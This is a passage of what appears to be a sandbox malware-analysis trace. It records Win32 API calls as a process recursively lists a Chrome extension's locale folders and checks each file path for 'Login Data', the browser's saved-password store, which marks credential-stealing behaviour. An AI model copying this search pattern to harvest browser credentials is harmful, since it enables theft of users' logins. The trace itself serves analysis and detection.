lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et" [0161.548] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\" [0161.548] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\") returned 138 [0161.548] lstrlenW (lpString="messages.json") returned 13 [0161.548] GetProcessHeap () returned 0x8e0000 [0161.548] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.548] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\" [0161.548] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json" [0161.549] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.549] GetProcessHeap () returned 0x8e0000 [0161.549] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.549] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\et\\messages.json", lpSrch="Login Data") returned 0x0 [0161.549] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.549] GetProcessHeap () returned 0x8e0000 [0161.549] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.549] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.549] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.549] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.549] GetProcessHeap () returned 0x8e0000 [0161.549] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.549] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.549] GetProcessHeap () returned 0x8e0000 [0161.549] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.549] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="fi", cAlternateFileName="")) returned 1 [0161.549] lstrcmpiW (lpString1="fi", lpString2=".") returned 1 [0161.549] lstrcmpiW (lpString1="fi", lpString2="..") returned 1 [0161.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.549] lstrlenW (lpString="\\") returned 1 [0161.549] GetProcessHeap () returned 0x8e0000 [0161.549] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.549] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.549] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.549] lstrlenW (lpString="fi") returned 2 [0161.549] GetProcessHeap () returned 0x8e0000 [0161.549] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.549] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.549] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0161.549] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.550] GetProcessHeap () returned 0x8e0000 [0161.550] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.550] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned 137 [0161.550] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned 137 [0161.550] lstrlenW (lpString="\\*.*") returned 4 [0161.550] GetProcessHeap () returned 0x8e0000 [0161.550] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.550] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0161.550] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*.*" [0161.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.550] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.550] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859d0870, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.550] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.550] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.550] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.550] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned 137 [0161.550] lstrlenW (lpString="\\") returned 1 [0161.550] GetProcessHeap () returned 0x8e0000 [0161.550] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.550] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi" [0161.550] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\" [0161.550] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\") returned 138 [0161.550] lstrlenW (lpString="messages.json") returned 13 [0161.550] GetProcessHeap () returned 0x8e0000 [0161.550] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.550] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\" [0161.550] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json" [0161.551] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.551] GetProcessHeap () returned 0x8e0000 [0161.551] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.551] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fi\\messages.json", lpSrch="Login Data") returned 0x0 [0161.551] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.551] GetProcessHeap () returned 0x8e0000 [0161.551] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.551] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x859d0870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859d0870, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd9, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.551] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.551] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.551] GetProcessHeap () returned 0x8e0000 [0161.551] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.551] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.551] GetProcessHeap () returned 0x8e0000 [0161.551] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.551] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x859f69d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x859f69d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x859f69d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="fil", cAlternateFileName="")) returned 1 [0161.551] lstrcmpiW (lpString1="fil", lpString2=".") returned 1 [0161.551] lstrcmpiW (lpString1="fil", lpString2="..") returned 1 [0161.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.551] lstrlenW (lpString="\\") returned 1 [0161.551] GetProcessHeap () returned 0x8e0000 [0161.551] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.551] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.551] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.551] lstrlenW (lpString="fil") returned 3 [0161.551] GetProcessHeap () returned 0x8e0000 [0161.551] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x925dd8 [0161.551] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.551] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0161.551] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.551] GetProcessHeap () returned 0x8e0000 [0161.552] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned 138 [0161.552] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned 138 [0161.552] lstrlenW (lpString="\\*.*") returned 4 [0161.552] GetProcessHeap () returned 0x8e0000 [0161.552] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11e) returned 0x91a0a8 [0161.552] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil" [0161.552] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\fil\\*.*" [0161.552] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 